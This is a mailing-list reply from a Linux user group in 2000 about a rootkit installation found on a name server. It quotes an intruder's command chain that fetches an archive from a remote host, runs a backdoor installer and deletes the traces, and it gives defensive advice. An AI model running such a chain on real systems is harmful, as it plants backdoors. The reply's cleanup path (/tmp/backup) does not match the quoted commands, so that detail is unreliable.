[lug] What does this mean?
Tkil
tkil at scrye.com
Mon Mar 20 23:29:54 MST 2000
>>>>> "Shannon" == nunar <nunar at mauromedia.net> writes:
[reformatted for sanity]
Shannon> I was going through my name server and somebody had entered this:
Shannon> # cd /tmp; \
Shannon> rcp disaus at linux7.europop.de:/dev/sdd0 ak.tgz; \
Shannon> echo "* downloaded "; \
Shannon> tar xfz ak*; \
Shannon> cd ak; \
Shannon> ./backdoor/ls; \
Shannon> cd ..; \
Shannon> rm -rf ak*; \
Shannon> exit
note that the only line which actually looks dangerous is the
"./backdoor/ls" one; everything else should be pretty polite.
(although, if they already have root... ouch.)
Shannon> Does anybody know what this is doing to my system?
short version: someone tried to run a rootkit against your box. i
can't tell offhand whether or not they succeeded, but you should
probably "rm -rf /tmp/backup" at the very least.
jafo says: if you are running redhat, check the MD5 sums of all the
packages on the box (this is an option to 'rpm'; consult the man page,
but"--verify" should be close...)
jafo also says: consult the most excellent linux security howto. (hi
kev!) accessable at:
http://www.tummy.com/security-howto/
prepare to do a backup of important data (e.g. your named config
files) and possibly do a full reinstall. be absolutely sure you are
running the latest versions of named and friends (BIND-*). also,
don't do a blind copy of the named config files; double-check that
nobody is using your server who shouldn't be.
t.
More information about the LUG
mailing list